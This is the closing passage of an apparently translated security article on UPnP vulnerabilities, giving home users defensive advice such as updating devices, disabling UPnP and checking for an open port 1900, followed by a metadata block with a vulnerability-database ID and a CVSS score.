For users, determining whether a device has UPnP-related vulnerabilities, or whether it is infected, is very tricky. Some devices may be hidden behind a NAT, so even if the vulnerability exists, the user will not immediately see the risk. To prevent the exploitation of UPnP-related vulnerabilities, users should make sure their devices are updated. If you suspect a device is infected, restart it, reset it to factory settings, or, to be prudent, replace it altogether. Unless the network needs a device to have UPnP enabled, it is best to disable it where the device allows. Note, however, that turning off UPnP may also disable some features, including ones that local devices depend on, or may cause requests from a device to be ignored.

Home users can also take the following measures to increase security:

1. Use the Trend Micro HouseCall for Home Networks tool to scan the home network and check which devices have UPnP port 1900 open.
2. Go to the device's setup page (for example, the router's settings page) to disable UPnP.
3. Manually configure port forwarding settings as needed.

Published 2019-03-29T00:00:00 Modified 2019-03-29T00:00:00 Edition 1
ID MYHACK58:62201993392 Type myhack58 Title "What will come out of the printer next? On the current state of UPnP usage and its risks (vulnerability warning), the black bar safety net" URL http://www.myhack58.com/Article/html/3/62/2019/93392.htm CVSS 10.0 (AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/)